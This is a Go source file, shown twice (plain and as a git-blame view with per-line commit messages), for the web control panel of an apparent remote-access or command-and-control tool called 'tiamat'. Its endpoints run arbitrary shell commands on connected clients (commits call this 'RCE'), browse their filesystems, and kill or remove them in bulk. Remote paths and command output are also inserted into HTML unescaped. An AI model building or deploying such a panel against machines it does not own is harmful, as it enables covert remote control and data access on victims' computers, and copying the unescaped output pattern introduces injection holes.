tiamat/cmd/httpServer.go

package cmd

import (
	"embed"
	"encoding/json"
	"fmt"
	"log"
	"net/http"
	"os"
	"strconv"
	"strings"
	"time"

	"github.com/gin-gonic/gin"
	"github.com/spf13/viper"
)

var (
	WebPort string = "8080"
)

//go:embed templates/*
var templatesFolder embed.FS

func WebServer() {
	p := viper.GetString("Server.WebPort")
	if p != "" {
		WebPort = p
	}
	gin.SetMode(gin.ReleaseMode)
	r := gin.Default()
	LoadHTMLFromEmbedFS(r, templatesFolder, "templates/*.html")
	r.StaticFileFS("/style.css", "./templates/style.css", http.FS(templatesFolder))
	r.StaticFileFS("/htmx.js", "./templates/htmx.js", http.FS(templatesFolder))
	setFavicons(r)

	r.GET("/", getRoot)
	r.GET("/command/:clientid", getCommands)
	r.GET("/fs/:clientid", getFilesystem)
	r.POST("/ls/:clientid", listFiles)
	r.POST("/command/:clientid", execCMD)
	r.POST("/kill/:clientid", sendKillswitch)
	r.GET("/dump", dumpClients)
	r.POST("/save", saveClients)
	r.POST("/remove/:clientid", removeClient)
	r.POST("/bulk-kill", bulkKill)
	r.POST("/bulk-remove/", bulkRemove)

	// Start
	r.Run(":" + WebPort)
}

func listFiles(c *gin.Context) {
	id := c.Param("clientid")
	idInt, err := strconv.Atoi(id)
	if err != nil {
		c.String(http.StatusInternalServerError, "Error happened, please make this a proper error later")
		return
	}

	client, _, err := returnClient(idInt)
	if err != nil {
		return
	}

	if client.IsOnline == false {
		c.String(http.StatusOK, "Client is currently offline!")
		return
	}

	path, _ := c.GetPostForm("cmd")

	resp, err := requestFiles(*client, path)
	if err != nil {
		e := fmt.Sprintf("Error happened executing command: %v\n", err)
		c.String(http.StatusOK, e)
		return
	}
	var list string
	for _, v := range resp.FileList.File {
		isDir := ""
		if v.IsFolder == true {
			isDir = "/"
		}
		entry := fmt.Sprintf("<p><a hx-post=\"/ls/%v\" hx-target=\"#files\" hx-vals='{\"cmd\": \"%v\"}' id=\"pointer\">%v%v</a></p>",
			client.ClientID, v.FullPath, v.FullPath, isDir)
		list += entry
	}
	c.String(http.StatusOK, list)

}

func bulkKill(c *gin.Context) {
	list := Bulk{}
	c.ShouldBind(&list)
	if len(list.ClientIDs) == 0 {
		return
	}
	for _, v := range list.ClientIDs {
		genericKillswitch(v)
	}
}

func bulkRemove(c *gin.Context) {
	list := Bulk{}
	c.ShouldBind(&list)
	if len(list.ClientIDs) == 0 {
		return
	}
	for _, v := range list.ClientIDs {
		genericRemoveClient(v)
	}
}

func dumpClients(c *gin.Context) {
	jsonClients := marshalClients()
	c.IndentedJSON(http.StatusOK, jsonClients)
}

func saveClients(c *gin.Context) {
	log.Println("Saving clients...")
	jsonClients := marshalClients()
	fileToSaveTo, err := setClientPath()
	if err != nil {
		log.Print(err)
		return
	}

	f, err := os.Create(fileToSaveTo)
	if err != nil {
		log.Print(err)
		return
	}
	defer f.Close()
	as_json, _ := json.MarshalIndent(jsonClients, "", "\t")
	f.Write(as_json)
	log.Println("Success!")
}

func removeClient(c *gin.Context) {
	clientID := c.Param("clientid")
	intClientID, err := strconv.Atoi(clientID)
	if err != nil {
		c.String(http.StatusInternalServerError, "Error happened fetching client: %v", err)
		return
	}
	genericRemoveClient(intClientID)
}

func genericRemoveClient(id int) {
	client, id, err := returnClient(id)
	if err != nil {
		return
	}

	if client.IsOnline == true {
		client.Instruct(Instructions{
			IsKillswitch: true,
		})
	}

	log.Printf("Removing client %v\n", id)
	if len(clientList) != 1 {
		clientList = append(clientList[:id], clientList[id+1:]...)
	} else {
		clientList = nil
	}
	log.Printf("Success!")
}

func marshalClients() ClientJSON {
	jsonClients := ClientJSON{Date: time.Now()}
	for _, v := range clientList {
		jsonClients.List = append(jsonClients.List, v.ClientBasicInfo)
	}
	return jsonClients
}

func getRoot(c *gin.Context) {
	c.HTML(http.StatusOK, "templates/index.html", gin.H{
		"Clients": clientList,
	})
}

func getCommands(c *gin.Context) {
	clientID := c.Param("clientid")
	intClientID, err := strconv.Atoi(clientID)
	if err != nil {
		c.String(http.StatusInternalServerError, "Error happened fetching client: %v", err)
		return
	}
	client, _, err := returnClient(intClientID)
	if err != nil {
		c.String(http.StatusNotFound, "Client not found")
		return
	}
	c.HTML(http.StatusOK, "templates/command.html", gin.H{
		"Client": client,
	})
}

func getFilesystem(c *gin.Context) {
	clientID := c.Param("clientid")
	intClientID, err := strconv.Atoi(clientID)
	if err != nil {
		c.String(http.StatusInternalServerError, "Error happened fetching client: %v", err)
		return
	}
	client, _, err := returnClient(intClientID)
	if err != nil {
		c.String(http.StatusNotFound, "Client not found")
		return
	}
	c.HTML(http.StatusOK, "templates/fs.html", gin.H{
		"Client": client,
	})
}

func sendKillswitch(c *gin.Context) {
	clientID := c.Param("clientid")
	intClientID, err := strconv.Atoi(clientID)
	if err != nil {
		c.String(http.StatusInternalServerError, "Error happened fetching client: %v", err)
		return
	}
	genericKillswitch(intClientID)
}

func genericKillswitch(id int) {
	_, id, err := returnClient(id)
	if err != nil {
		return
	}

	if clientList[id].IsOnline == false {
		return
	}

	inst := Instructions{
		IsKillswitch: true,
	}
	clientList[id].Instruct(inst)
	clientList[id].IsOnline = false
}

func execCMD(c *gin.Context) {
	id := c.Param("clientid")
	idInt, err := strconv.Atoi(id)
	if err != nil {
		c.String(http.StatusInternalServerError, "Error happened, please make this a proper error later")
		return
	}

	client, _, err := returnClient(idInt)
	if err != nil {
		return
	}

	if client.IsOnline == false {
		c.String(http.StatusOK, "Client is currently offline!")
		return
	}

	command, _ := c.GetPostForm("cmd")

	out, err := sendCommand(*client, command)
	if err != nil {
		e := fmt.Sprintf("Error happened executing command: %v\n", err)
		c.String(http.StatusOK, e)
		return
	}
	prettyOut := strings.Replace(out, "\n", "<br>", -1)
	c.String(http.StatusOK, "$ "+command+"<br>"+prettyOut)
}

func setFavicons(r *gin.Engine) {
	r.StaticFileFS("/favicon.ico", "./templates/assets/favicon.ico", http.FS(templatesFolder))
	r.StaticFileFS("/favicon-32x32.png", "./templates/assets/favicon-32x32.png", http.FS(templatesFolder))
	r.StaticFileFS("/favicon-16x16.png", "./templates/assets/favicon-16x16.png", http.FS(templatesFolder))
	r.StaticFileFS("/apple-touch-icon.png", "./templates/assets/apple-touch-icon.png", http.FS(templatesFolder))
	r.StaticFileFS("/android-chrome-512x512.png", "./templates/assets/android-chrome-512x512.png", http.FS(templatesFolder))
	r.StaticFileFS("/android-chrome-192x192.png", "./templates/assets/android-chrome-192x192.png", http.FS(templatesFolder))
	r.StaticFileFS("/site.webmanifest", "./templates/assets/site.webmanifest", http.FS(templatesFolder))
}
Prepare listening servers 2024-06-03 09:24:18 +02:00			`package cmd`

			`import (`
Configure rendering connected clients on HTML 2024-06-03 10:44:16 +02:00			`"embed"`
Allow user to save clients directly to config 2024-06-11 10:45:31 +02:00			`"encoding/json"`
Configure rudimentary setup for requesting commands 2024-06-05 09:47:16 +02:00			`"fmt"`
Allow user to save clients directly to config 2024-06-11 10:45:31 +02:00			`"log"`
Prepare listening servers 2024-06-03 09:24:18 +02:00			`"net/http"`
Allow user to save clients directly to config 2024-06-11 10:45:31 +02:00			`"os"`
Configure rudimentary setup for requesting commands 2024-06-05 09:47:16 +02:00			`"strconv"`
Implement backend for RCE 2024-06-06 09:32:35 +02:00			`"strings"`
Create endpoint for dumping client list json 2024-06-07 11:07:35 +02:00			`"time"`
Prepare listening servers 2024-06-03 09:24:18 +02:00
			`"github.com/gin-gonic/gin"`
			`"github.com/spf13/viper"`
			`)`

			`var (`
			`WebPort string = "8080"`
			`)`

Configure rendering connected clients on HTML 2024-06-03 10:44:16 +02:00			`//go:embed templates/*`
			`var templatesFolder embed.FS`

Prepare listening servers 2024-06-03 09:24:18 +02:00			`func WebServer() {`
			`p := viper.GetString("Server.WebPort")`
			`if p != "" {`
			`WebPort = p`
			`}`
			`gin.SetMode(gin.ReleaseMode)`
			`r := gin.Default()`
Configure rendering connected clients on HTML 2024-06-03 10:44:16 +02:00			`LoadHTMLFromEmbedFS(r, templatesFolder, "templates/*.html")`
			`r.StaticFileFS("/style.css", "./templates/style.css", http.FS(templatesFolder))`
Add OK/Offline field and small improvements 2024-06-04 12:41:09 +02:00			`r.StaticFileFS("/htmx.js", "./templates/htmx.js", http.FS(templatesFolder))`
Add favicon for control panel 2024-06-10 11:33:31 +02:00			`setFavicons(r)`

Prepare listening servers 2024-06-03 09:24:18 +02:00			`r.GET("/", getRoot)`
Configure rudimentary setup for requesting commands 2024-06-05 09:47:16 +02:00			`r.GET("/command/:clientid", getCommands)`
Configure webserver backend for requesting file lists 2024-06-17 10:04:40 +02:00			`r.GET("/fs/:clientid", getFilesystem)`
			`r.POST("/ls/:clientid", listFiles)`
Configure rudimentary setup for requesting commands 2024-06-05 09:47:16 +02:00			`r.POST("/command/:clientid", execCMD)`
Setup killswitch function backend 2024-06-07 09:59:14 +02:00			`r.POST("/kill/:clientid", sendKillswitch)`
Create endpoint for dumping client list json 2024-06-07 11:07:35 +02:00			`r.GET("/dump", dumpClients)`
Allow user to save clients directly to config 2024-06-11 10:45:31 +02:00			`r.POST("/save", saveClients)`
Add option to delete clients from list 2024-06-11 12:27:43 +02:00			`r.POST("/remove/:clientid", removeClient)`
Create generic kill/remove funcs and setup bulk actions backend 2024-06-13 09:24:20 +02:00			`r.POST("/bulk-kill", bulkKill)`
			`r.POST("/bulk-remove/", bulkRemove)`

			`// Start`
Prepare listening servers 2024-06-03 09:24:18 +02:00			`r.Run(":" + WebPort)`
			`}`

Configure webserver backend for requesting file lists 2024-06-17 10:04:40 +02:00			`func listFiles(c *gin.Context) {`
			`id := c.Param("clientid")`
			`idInt, err := strconv.Atoi(id)`
			`if err != nil {`
			`c.String(http.StatusInternalServerError, "Error happened, please make this a proper error later")`
			`return`
			`}`

			`client, _, err := returnClient(idInt)`
			`if err != nil {`
			`return`
			`}`

			`if client.IsOnline == false {`
			`c.String(http.StatusOK, "Client is currently offline!")`
			`return`
			`}`

			`path, _ := c.GetPostForm("cmd")`

			`resp, err := requestFiles(*client, path)`
			`if err != nil {`
			`e := fmt.Sprintf("Error happened executing command: %v\n", err)`
			`c.String(http.StatusOK, e)`
			`return`
			`}`
			`var list string`
			`for _, v := range resp.FileList.File {`
			`isDir := ""`
			`if v.IsFolder == true {`
			`isDir = "/"`
			`}`
Formatting tweaks 2024-06-17 10:58:21 +02:00			`entry := fmt.Sprintf("<p><a hx-post=\"/ls/%v\" hx-target=\"#files\" hx-vals='{\"cmd\": \"%v\"}' id=\"pointer\">%v%v</a></p>",`
Configure webserver backend for requesting file lists 2024-06-17 10:04:40 +02:00			`client.ClientID, v.FullPath, v.FullPath, isDir)`
			`list += entry`
			`}`
			`c.String(http.StatusOK, list)`

			`}`

Create generic kill/remove funcs and setup bulk actions backend 2024-06-13 09:24:20 +02:00			`func bulkKill(c *gin.Context) {`
			`list := Bulk{}`
			`c.ShouldBind(&list)`
			`if len(list.ClientIDs) == 0 {`
			`return`
			`}`
			`for _, v := range list.ClientIDs {`
			`genericKillswitch(v)`
			`}`
			`}`

			`func bulkRemove(c *gin.Context) {`
			`list := Bulk{}`
			`c.ShouldBind(&list)`
			`if len(list.ClientIDs) == 0 {`
			`return`
			`}`
			`for _, v := range list.ClientIDs {`
			`genericRemoveClient(v)`
			`}`
			`}`

Create endpoint for dumping client list json 2024-06-07 11:07:35 +02:00			`func dumpClients(c *gin.Context) {`
Allow user to save clients directly to config 2024-06-11 10:45:31 +02:00			`jsonClients := marshalClients()`
			`c.IndentedJSON(http.StatusOK, jsonClients)`
			`}`

			`func saveClients(c *gin.Context) {`
			`log.Println("Saving clients...")`
			`jsonClients := marshalClients()`
			`fileToSaveTo, err := setClientPath()`
			`if err != nil {`
			`log.Print(err)`
			`return`
			`}`

			`f, err := os.Create(fileToSaveTo)`
			`if err != nil {`
			`log.Print(err)`
			`return`
			`}`
			`defer f.Close()`
			`as_json, _ := json.MarshalIndent(jsonClients, "", "\t")`
			`f.Write(as_json)`
Return pointer to clientList item instead of copy I've also fixed several issues such as the killswitch and RCE functions failing because of trying to use the struct identifier to access the clientList array 2024-06-12 09:49:37 +02:00			`log.Println("Success!")`
Allow user to save clients directly to config 2024-06-11 10:45:31 +02:00			`}`

Add option to delete clients from list 2024-06-11 12:27:43 +02:00			`func removeClient(c *gin.Context) {`
			`clientID := c.Param("clientid")`
			`intClientID, err := strconv.Atoi(clientID)`
			`if err != nil {`
			`c.String(http.StatusInternalServerError, "Error happened fetching client: %v", err)`
			`return`
			`}`
Create generic kill/remove funcs and setup bulk actions backend 2024-06-13 09:24:20 +02:00			`genericRemoveClient(intClientID)`
			`}`

			`func genericRemoveClient(id int) {`
			`client, id, err := returnClient(id)`
Fix issues caused by accessing clients via array identifier 2024-06-11 13:41:49 +02:00			`if err != nil {`
			`return`
			`}`
Check if client is online before sending killswitch 2024-06-12 08:10:06 +02:00
			`if client.IsOnline == true {`
			`client.Instruct(Instructions{`
			`IsKillswitch: true,`
			`})`
			`}`

Create generic kill/remove funcs and setup bulk actions backend 2024-06-13 09:24:20 +02:00			`log.Printf("Removing client %v\n", id)`
Add option to delete clients from list 2024-06-11 12:27:43 +02:00			`if len(clientList) != 1 {`
Return pointer to clientList item instead of copy I've also fixed several issues such as the killswitch and RCE functions failing because of trying to use the struct identifier to access the clientList array 2024-06-12 09:49:37 +02:00			`clientList = append(clientList[:id], clientList[id+1:]...)`
Add option to delete clients from list 2024-06-11 12:27:43 +02:00			`} else {`
			`clientList = nil`
			`}`
			`log.Printf("Success!")`
			`}`

Allow user to save clients directly to config 2024-06-11 10:45:31 +02:00			`func marshalClients() ClientJSON {`
Create endpoint for dumping client list json 2024-06-07 11:07:35 +02:00			`jsonClients := ClientJSON{Date: time.Now()}`
			`for _, v := range clientList {`
			`jsonClients.List = append(jsonClients.List, v.ClientBasicInfo)`
			`}`
Allow user to save clients directly to config 2024-06-11 10:45:31 +02:00			`return jsonClients`
Create endpoint for dumping client list json 2024-06-07 11:07:35 +02:00			`}`

Prepare listening servers 2024-06-03 09:24:18 +02:00			`func getRoot(c *gin.Context) {`
Configure rendering connected clients on HTML 2024-06-03 10:44:16 +02:00			`c.HTML(http.StatusOK, "templates/index.html", gin.H{`
Setup killswitch function backend 2024-06-07 09:59:14 +02:00			`"Clients": clientList,`
Configure rendering connected clients on HTML 2024-06-03 10:44:16 +02:00			`})`
Prepare listening servers 2024-06-03 09:24:18 +02:00			`}`
Configure rudimentary setup for requesting commands 2024-06-05 09:47:16 +02:00
			`func getCommands(c *gin.Context) {`
			`clientID := c.Param("clientid")`
			`intClientID, err := strconv.Atoi(clientID)`
			`if err != nil {`
			`c.String(http.StatusInternalServerError, "Error happened fetching client: %v", err)`
			`return`
			`}`
Return pointer to clientList item instead of copy I've also fixed several issues such as the killswitch and RCE functions failing because of trying to use the struct identifier to access the clientList array 2024-06-12 09:49:37 +02:00			`client, _, err := returnClient(intClientID)`
Configure rudimentary setup for requesting commands 2024-06-05 09:47:16 +02:00			`if err != nil {`
			`c.String(http.StatusNotFound, "Client not found")`
			`return`
			`}`
			`c.HTML(http.StatusOK, "templates/command.html", gin.H{`
Setup killswitch function backend 2024-06-07 09:59:14 +02:00			`"Client": client,`
Configure webserver backend for requesting file lists 2024-06-17 10:04:40 +02:00			`})`
			`}`

			`func getFilesystem(c *gin.Context) {`
			`clientID := c.Param("clientid")`
			`intClientID, err := strconv.Atoi(clientID)`
			`if err != nil {`
			`c.String(http.StatusInternalServerError, "Error happened fetching client: %v", err)`
			`return`
			`}`
			`client, _, err := returnClient(intClientID)`
			`if err != nil {`
			`c.String(http.StatusNotFound, "Client not found")`
			`return`
			`}`
			`c.HTML(http.StatusOK, "templates/fs.html", gin.H{`
			`"Client": client,`
Configure rudimentary setup for requesting commands 2024-06-05 09:47:16 +02:00			`})`
			`}`

Setup killswitch function backend 2024-06-07 09:59:14 +02:00			`func sendKillswitch(c *gin.Context) {`
			`clientID := c.Param("clientid")`
			`intClientID, err := strconv.Atoi(clientID)`
			`if err != nil {`
			`c.String(http.StatusInternalServerError, "Error happened fetching client: %v", err)`
			`return`
			`}`
Create generic kill/remove funcs and setup bulk actions backend 2024-06-13 09:24:20 +02:00			`genericKillswitch(intClientID)`
			`}`

			`func genericKillswitch(id int) {`
			`_, id, err := returnClient(id)`
Return pointer to clientList item instead of copy I've also fixed several issues such as the killswitch and RCE functions failing because of trying to use the struct identifier to access the clientList array 2024-06-12 09:49:37 +02:00			`if err != nil {`
			`return`
			`}`
Check if client is online before trying to execute instructions 2024-06-07 12:39:07 +02:00
Return pointer to clientList item instead of copy I've also fixed several issues such as the killswitch and RCE functions failing because of trying to use the struct identifier to access the clientList array 2024-06-12 09:49:37 +02:00			`if clientList[id].IsOnline == false {`
Check if client is online before trying to execute instructions 2024-06-07 12:39:07 +02:00			`return`
			`}`

Setup killswitch function backend 2024-06-07 09:59:14 +02:00			`inst := Instructions{`
			`IsKillswitch: true,`
			`}`
Return pointer to clientList item instead of copy I've also fixed several issues such as the killswitch and RCE functions failing because of trying to use the struct identifier to access the clientList array 2024-06-12 09:49:37 +02:00			`clientList[id].Instruct(inst)`
			`clientList[id].IsOnline = false`
Setup killswitch function backend 2024-06-07 09:59:14 +02:00			`}`

Configure rudimentary setup for requesting commands 2024-06-05 09:47:16 +02:00			`func execCMD(c *gin.Context) {`
Implement backend for RCE 2024-06-06 09:32:35 +02:00			`id := c.Param("clientid")`
			`idInt, err := strconv.Atoi(id)`
			`if err != nil {`
			`c.String(http.StatusInternalServerError, "Error happened, please make this a proper error later")`
			`return`
			`}`
Check if client is online before trying to execute instructions 2024-06-07 12:39:07 +02:00
Return pointer to clientList item instead of copy I've also fixed several issues such as the killswitch and RCE functions failing because of trying to use the struct identifier to access the clientList array 2024-06-12 09:49:37 +02:00			`client, _, err := returnClient(idInt)`
Fix issues caused by accessing clients via array identifier 2024-06-11 13:41:49 +02:00			`if err != nil {`
			`return`
			`}`

			`if client.IsOnline == false {`
Check if client is online before trying to execute instructions 2024-06-07 12:39:07 +02:00			`c.String(http.StatusOK, "Client is currently offline!")`
			`return`
			`}`

Implement backend for RCE 2024-06-06 09:32:35 +02:00			`command, _ := c.GetPostForm("cmd")`

Return pointer to clientList item instead of copy I've also fixed several issues such as the killswitch and RCE functions failing because of trying to use the struct identifier to access the clientList array 2024-06-12 09:49:37 +02:00			`out, err := sendCommand(*client, command)`
Implement backend for RCE 2024-06-06 09:32:35 +02:00			`if err != nil {`
			`e := fmt.Sprintf("Error happened executing command: %v\n", err)`
			`c.String(http.StatusOK, e)`
			`return`
			`}`
			`prettyOut := strings.Replace(out, "\n", "<br>", -1)`
UX improvements 2024-06-07 08:31:52 +02:00			`c.String(http.StatusOK, "$ "+command+"<br>"+prettyOut)`
Configure rudimentary setup for requesting commands 2024-06-05 09:47:16 +02:00			`}`
Add favicon for control panel 2024-06-10 11:33:31 +02:00
			`func setFavicons(r *gin.Engine) {`
			`r.StaticFileFS("/favicon.ico", "./templates/assets/favicon.ico", http.FS(templatesFolder))`
			`r.StaticFileFS("/favicon-32x32.png", "./templates/assets/favicon-32x32.png", http.FS(templatesFolder))`
			`r.StaticFileFS("/favicon-16x16.png", "./templates/assets/favicon-16x16.png", http.FS(templatesFolder))`
			`r.StaticFileFS("/apple-touch-icon.png", "./templates/assets/apple-touch-icon.png", http.FS(templatesFolder))`
			`r.StaticFileFS("/android-chrome-512x512.png", "./templates/assets/android-chrome-512x512.png", http.FS(templatesFolder))`
			`r.StaticFileFS("/android-chrome-192x192.png", "./templates/assets/android-chrome-192x192.png", http.FS(templatesFolder))`
			`r.StaticFileFS("/site.webmanifest", "./templates/assets/site.webmanifest", http.FS(templatesFolder))`
			`}`